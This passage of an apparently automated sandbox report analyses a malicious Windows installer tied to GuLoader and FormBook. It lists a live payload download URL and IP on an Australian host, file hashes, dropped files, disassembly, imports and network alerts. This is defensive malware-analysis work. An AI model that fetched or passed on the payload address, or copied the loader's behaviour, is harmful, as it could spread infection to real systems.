          http://www.ftp.ftp://ftp.gopher.Ntwph4urc1.exe, 00000009.00000001.1842784035.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
            		high
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdNtwph4urc1.exe, 00000009.00000001.1842784035.00000000005F2000.00000008.00000001.01000000.00000006.sdmpfalse
              		high
              http://nsis.sf.net/NSIS_ErrorErrorNtwph4urc1.exe, 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000005.00000000.1271388183.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000009.00000000.1839438284.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                		high
                https://babalharra.com.au/Ntwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Ntwph4urc1.exe, 00000009.00000001.1842784035.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
                  		high
                  https://babalharra.com.au/yzSJO174.binFNtwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  122.201.127.17
                  		babalharra.com.auAustralia
                  		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUfalse

                  General Information

                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1588721
                  Start date and time:2025-01-11 04:48:40 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 37s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Run with higher sleep bypass
                  Number of analysed new started processes analysed:22
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Ntwph4urc1.exe
                  renamed because original name is a hash value
                  Original Sample Name:ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f.exe
                  Detection:MAL
                  Classification:mal80.troj.evad.winEXE@3/5@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 88%
                  • Number of executed functions: 41
                  • Number of non-executed functions: 307
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 20.190.160.22, 40.126.32.68, 40.126.32.140, 40.126.32.138, 20.190.160.17, 20.190.160.20, 40.126.32.74, 20.190.160.14, 13.107.246.45, 172.202.163.200
                  • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, tile-service.weather.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, time.windows.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  122.201.127.1702Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      http://constructivesoftware.com.auGet hashmaliciousUnknownBrowse

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        babalharra.com.au02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 122.201.127.17
                        Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 122.201.127.17

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 122.201.127.17
                        http://www.austrata.net.auGet hashmaliciousUnknownBrowse
                        • 185.184.154.201
                        https://snip.ly/kx81x2Get hashmaliciousUnknownBrowse
                        • 203.170.87.17
                        la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                        • 103.226.223.88
                        https://www.google.co.id/url?q=sf_rand(2000)CHARtTPSJ3J3wDyycT&sa=t&esrc=sf_rand(2000)gECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=sf_rand(2000)RlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/apcarpetcleaning.com.au%2Fkom%2Fwp-images%2Fpoom%0A%2Fsf_rand_string_mixed(24)/tmitchell@encorecompliance.comGet hashmaliciousUnknownBrowse
                        • 203.170.84.122
                        Last Annual payment.htmGet hashmaliciousPhisherBrowse
                        • 203.170.84.122
                        http://www.therowlands.com.au/wp-includes/js/jquery/jquery-migrate.min.jsGet hashmaliciousUnknownBrowse
                        • 203.170.86.89
                        PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                        • 103.20.200.105
                        Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 122.201.127.17

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        37f463bf4616ecd445d4a1937da06e192976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                        • 122.201.127.17
                        2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                        • 122.201.127.17
                        2976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                        • 122.201.127.17
                        yMXFgPOdf2.exeGet hashmaliciousGuLoaderBrowse
                        • 122.201.127.17
                        2976587-987347589.07.exeGet hashmaliciousUnknownBrowse
                        • 122.201.127.17
                        yMXFgPOdf2.exeGet hashmaliciousGuLoaderBrowse
                        • 122.201.127.17
                        02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 122.201.127.17
                        LMSxhK1u8Z.exeGet hashmaliciousGuLoaderBrowse
                        • 122.201.127.17
                        ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                        • 122.201.127.17

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          02Eh1ah35H.exeGet hashmaliciousGuLoaderBrowse
                            Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              Document_084462.scr.exeGet hashmaliciousGuLoaderBrowse
                                PO.exeGet hashmaliciousGuLoaderBrowse
                                  PO.exeGet hashmaliciousGuLoaderBrowse
                                    yuc1Jwlkh5.exeGet hashmaliciousGuLoaderBrowse
                                      yuc1Jwlkh5.exeGet hashmaliciousGuLoaderBrowse
                                        IMAGE000Pdf.exeGet hashmaliciousGuLoaderBrowse

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll

                                          Download File
                                          Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:modified
                                          Size (bytes):12288
                                          Entropy (8bit):5.737556724687435
                                          Encrypted:false
                                          SSDEEP:192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
                                          MD5:6E55A6E7C3FDBD244042EB15CB1EC739
                                          SHA1:070EA80E2192ABC42F358D47B276990B5FA285A9
                                          SHA-256:ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
                                          SHA-512:2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Joe Sandbox View:
                                          • Filename: 02Eh1ah35H.exe, Detection: malicious, Browse
                                          • Filename: 02Eh1ah35H.exe, Detection: malicious, Browse
                                          • Filename: Document_084462.scr.exe, Detection: malicious, Browse
                                          • Filename: Document_084462.scr.exe, Detection: malicious, Browse
                                          • Filename: PO.exe, Detection: malicious, Browse
                                          • Filename: PO.exe, Detection: malicious, Browse
                                          • Filename: yuc1Jwlkh5.exe, Detection: malicious, Browse
                                          • Filename: yuc1Jwlkh5.exe, Detection: malicious, Browse
                                          • Filename: IMAGE000Pdf.exe, Detection: malicious, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...X..`...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Sulfoforbindelserne.chl

                                          Download File
                                          Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):116773
                                          Entropy (8bit):1.2617404262864118
                                          Encrypted:false
                                          SSDEEP:768:4yTqkjNz46YyMqMTGZGi7vk59sktCQ3am6ZRN8rOFlS70dhEr:0avCLJ
                                          MD5:753C4F9B2F84095556E2C65E2569D814
                                          SHA1:3F878C44B311B8C34B2A6E09F49324D42FAD1437
                                          SHA-256:E6DCE06287ACEBCFB23DA58EAC6AAA36E253BADB493125F47E801B99C4E48B25
                                          SHA-512:8C19F357F4A59D5CB493F418C82B0D06ECED25EC9D05E9B1CFF943A6A79232DC6B2EBC3552B0BFBA76018A7FCEFE8A0410ADEE739151640F149884A4FC3DF651
                                          Malicious:false
                                          Reputation:low
                                          Preview:..................................................V...................Y..Y................................................................................................................M.......................................................................................*.......................`...............................................A................D....D....................................................."................................................l.............\.....%....:......*.......................................................................................c.....M........?......................5........G...................................................U.........................................................................5.8...s................[.....m.....{...........................)$..................................................lm.....................................................}................................................................

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Umpiress240.biv

                                          Download File
                                          Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):222131
                                          Entropy (8bit):1.2548431305039245
                                          Encrypted:false
                                          SSDEEP:768:I2mmH3AhfHp+POGgRSRFZHl2bxYLbBjJ4tFGZjDyYqIx3x9+6yiKk+vlK5u5DF+G:UoNwkuoHtyiKJlQVD
                                          MD5:C018B5D87F38B0DBA90AFE75F72B6798
                                          SHA1:9B43AE84826B712BB8152D70D2D7B929DB5CE3E2
                                          SHA-256:323B7D5F0C7A4F9FA87D8F6DD9A18E81F4284C31DA4FDD5FFE7022501445FD1C
                                          SHA-512:D4D6A99EBA1F594BA4052F4C83C93946749EE7524D5765CFD67C0CD34BBA3F1ABBDEA259EBE155A3767898AAE806E29E42BE6539C4A2DC067730EC6D9655ECD5
                                          Malicious:false
                                          Reputation:low
                                          Preview:.....................................%..................................................................................................................L....B..............................I...........]...........i.........A............\............................................................................................................................................................................................&..............s............................................................................(........].........................................................................,..............]...............F..............G....+..............................................F..............9...........,........i.............................................................................................h...k........................Y......k..........................................................U..........R..................................C...........e..................

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Vaabenstyringssystemernes.War

                                          Download File
                                          Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):282823
                                          Entropy (8bit):7.646614769640198
                                          Encrypted:false
                                          SSDEEP:6144:lvvE12Nsu4oMNgJMD20aAW49+ShpU5tgrLMpaP:lXmkMNOZq+Sh1rL4Y
                                          MD5:9CE7FE4FC49B74D4A9E8E63C97EDA3D7
                                          SHA1:0DF4A59A5F43A5A406B28D449369D25B4EA35B49
                                          SHA-256:ECB2D16F05215EE09B30050618170CBFD7B6E52D128B4429F69D1B419974842C
                                          SHA-512:7F55112F98B31966A41DBD77AA416BA8964CE689679E2EA4C218398FBAD1319C5ABDE73222DCDCD6CEB53F5A1224234427F611686DD44DB29919230587782C98
                                          Malicious:false
                                          Reputation:low
                                          Preview:.....kk.t...[[[[.......S...Z........................33...u...,........U......f...pp...........`............................................`...............W............II....l......................,,,...........kk.........99.............................?.N......##.......xx...F........%.n...T........vvv...................."....................:...........pp..++......IIIII...$...{..{.uu....................4444..$.E.%..#........................v.......................L..{...;.GG....mm.......oo.J.K...P.JJJ.......}}.....//..........RR.........................%%%%.....8..9.......F...ll........................j..........gg......%%........o................#......WWWWW.............................*......R............s.....HH...................i.HH....P.....d.......p.................D......---....NN.......yy.j...................99................?.........................[[....>>>>..................................LL...........U....................4...$...`....55....................J.=..........

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\potmaker.sti

                                          Download File
                                          Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):477418
                                          Entropy (8bit):1.2516735777117096
                                          Encrypted:false
                                          SSDEEP:1536:BugSY71rrh1lxz0ZSyCjm0eydI6Vl73+ByRgN:F7Zrh4SvQy3SBGgN
                                          MD5:B86B0A4CFA46775BAEEE023CCECA54E1
                                          SHA1:16BABC347EBFC80762D73A12FF39E5ADE55EC7DB
                                          SHA-256:7B1E45A0398C8428C6CF476DAE264102A842FACC20930B57688960046FF087F6
                                          SHA-512:42787A7037E7D117D82AF3580306C7C10854B279CEC0B38956217B4E04222B34EAC50763B0DB850454DC0AA43B5238297D39FC8E5A681C805966E0BCCD4E7C0D
                                          Malicious:false
                                          Preview:.................................E..............................................................................................................................F......................................./..............#...........n...t..>..........]...............".................|................................4...........s...z......................................................................................U......................................................................J...............................................................j......................-......."...._..............;.............X........................3.H....................................P........#...............L.....................................,......................................R........&..............................................................................................................`<.....f......E..al.....................S..........................................V..............

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.957710020525607
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Ntwph4urc1.exe
                                          File size:437'610 bytes
                                          MD5:c57da1bb37a79e6f05722518dbadb3ce
                                          SHA1:c7d63301754e2a380d29a9170654670e4beeb1ad
                                          SHA256:ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f
                                          SHA512:872e1e462cd6ebdd2140463fa8ad91675840a754b4c3ef52641c7bcfdb4d8951decbffb284344e9a8a2c2ad93d8821ea973eac6d434552d7a88236a1a054f933
                                          SSDEEP:12288:B3UIjsVFWZn9dzBoT2T/B1iP4C5tU2US0zT:B3UIjsVFWZf1oPPbU2US0z
                                          TLSH:F3942384B2D0A337D9EB6F31693A23321E9D48505C7DB3434F5C7A10773968A9B2E7A1
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L......`.................f....:....

                                          File Icon

                                          Icon Hash:3d2e0f95332b3399

                                          Static PE Info

                                          General

                                          Entrypoint:0x4034a2
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x60FC90D1 [Sat Jul 24 22:14:41 2021 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:6e7f9a29f2c85394521a08b9f31f6275

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 000002D4h
                                          push ebx
                                          push esi
                                          push edi
                                          push 00000020h
                                          pop edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+14h], ebx
                                          mov dword ptr [esp+10h], 0040A2E0h
                                          mov dword ptr [esp+1Ch], ebx
                                          call dword ptr [004080CCh]
                                          call dword ptr [004080D0h]
                                          and eax, BFFFFFFFh
                                          cmp ax, 00000006h
                                          mov dword ptr [007A8A6Ch], eax
                                          je 00007FA49121EED3h
                                          push ebx
                                          call 00007FA4912221C1h
                                          cmp eax, ebx
                                          je 00007FA49121EEC9h
                                          push 00000C00h
                                          call eax
                                          mov esi, 004082B0h
                                          push esi
                                          call 00007FA49122213Bh
                                          push esi
                                          call dword ptr [00408154h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], 00000000h
                                          jne 00007FA49121EEACh
                                          push 0000000Bh
                                          call 00007FA491222194h
                                          push 00000009h
                                          call 00007FA49122218Dh
                                          push 00000007h
                                          mov dword ptr [007A8A64h], eax
                                          call 00007FA491222181h
                                          cmp eax, ebx
                                          je 00007FA49121EED1h
                                          push 0000001Eh
                                          call eax
                                          test eax, eax
                                          je 00007FA49121EEC9h
                                          or byte ptr [007A8A6Fh], 00000040h
                                          push ebp
                                          call dword ptr [00408038h]
                                          push ebx
                                          call dword ptr [00408298h]
                                          mov dword ptr [007A8B38h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+34h]
                                          push 000002B4h
                                          push eax
                                          push ebx
                                          push 0079FF08h
                                          call dword ptr [0040818Ch]
                                          push 0040A2C8h

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c70000xb48.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x656c0x660012117ad2476c7a7912407af0dcfcb8a7False0.6737515318627451data6.47208759712619IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x80000x13980x1400e3e8d62e1d2308b175349eb9daa266c8False0.4494140625data5.137750894959169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0xa0000x39eb780x6002020ca26e010546720fd467c5d087b57unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata0x3a90000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x3c70000xb480xc0013d9a87cc14830e1f01c641a62386bbeFalse0.4215494791666667data4.357284806500026IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0x3c71c00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                          RT_DIALOG0x3c74a80x100dataEnglishUnited States0.5234375
                                          RT_DIALOG0x3c75a80x11cdataEnglishUnited States0.6056338028169014
                                          RT_DIALOG0x3c76c80xc4dataEnglishUnited States0.5918367346938775
                                          RT_DIALOG0x3c77900x60dataEnglishUnited States0.7291666666666666
                                          RT_GROUP_ICON0x3c77f00x14dataEnglishUnited States1.2
                                          RT_MANIFEST0x3c78080x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                          Imports

                                          DLLImport
                                          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2025-01-11T04:50:56.106860+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749974122.201.127.17443TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 11, 2025 04:50:54.599967003 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:54.600023031 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:54.600097895 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:54.610030890 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:54.610044003 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:55.593708992 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:55.593925953 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:55.650623083 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:55.650649071 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:55.650999069 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:55.651047945 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:55.655097008 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:55.699323893 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.106878042 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.106911898 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.107100010 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.107147932 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.107220888 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.314985037 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.314996958 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.315129042 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.315465927 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.315655947 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.316526890 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.316597939 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.317477942 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.317536116 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.624671936 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.624686956 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.624732018 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.624809027 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.624835968 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.624855995 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.624891996 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.624902964 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.624974012 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.625094891 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.625155926 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.625212908 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.625266075 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.625319958 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.625382900 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.732109070 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.732224941 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.732558012 CET44349974122.201.127.17192.168.2.7
